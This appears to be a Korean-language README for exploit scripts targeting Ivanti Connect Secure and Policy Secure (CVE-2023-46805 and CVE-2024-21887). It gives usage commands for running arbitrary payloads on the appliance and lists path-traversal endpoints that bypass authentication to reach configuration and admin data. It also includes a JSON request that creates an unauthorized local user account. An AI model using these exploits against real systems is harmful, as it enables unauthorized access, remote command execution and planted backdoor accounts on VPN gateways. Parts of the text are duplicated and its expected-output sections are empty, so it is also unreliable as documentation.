
Ivanti ICS 9.x, 22.x 및 Ivanti Policy Secure의 웹 구성 요소에 존재하는 인증 우회 취약점으로 인해 원격 공격자가 제어 검사를 우회하여 제한된 리소스에 접근할 수 있습니다.
Ivanti ICS 9.x, 22.x 및 Ivanti Policy Secure의 웹 구성 요소에서 발견된 인증 우회 취약점으로 인해 원격 공격자가 제어 검사를 우회하여 제한된 리소스에 액세스할 수 있습니다.
사용법: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

참고:
chmod +x CVE-2023-46805.sh
curl 및 json_pp 애플리케이션 필요
취약할 경우 다음과 같은 결과가 표시됩니다:

Ivanti Connect Secure(9.x, 22.x) 및 Ivanti Policy Secure의 웹 구성 요소에서 발견된 명령 주입 취약점으로 인해 인증된 관리자가 특수 제작된 요청을 보내고 어플라이언스에서 임의의 명령을 실행할 수 있습니다.
사용법: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"
취약할 경우 다음 결과가 표시되고 페이로드가 실행됩니다:

참고:
chmod +x CVE-2024-21887.sh
curl, xxd, tr 및 sed 앱 필요
/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users
/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users
-계정 만들기 /authentication/auth-servers/authserver/System%20Local/local/users/user
-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'
감사: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
나에 대해 더 보기 ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ 면책 조항: 중요: 이 스크립트는 교육, 윤리적 테스트 및 합법적인 용도로만 제공됩니다. 명시적인 허가 없이 시스템이나 네트워크에 사용하지 마십시오. 컴퓨터 시스템과 네트워크에 대한 무단 액세스는 불법이며, 무단 활동을 수행하는 사용자는 법적 조치를 받을 수 있습니다. 작성자는 이 스크립트의 오용으로 인해 발생하는 어떠한 손해에 대해서도 책임지지 않습니다.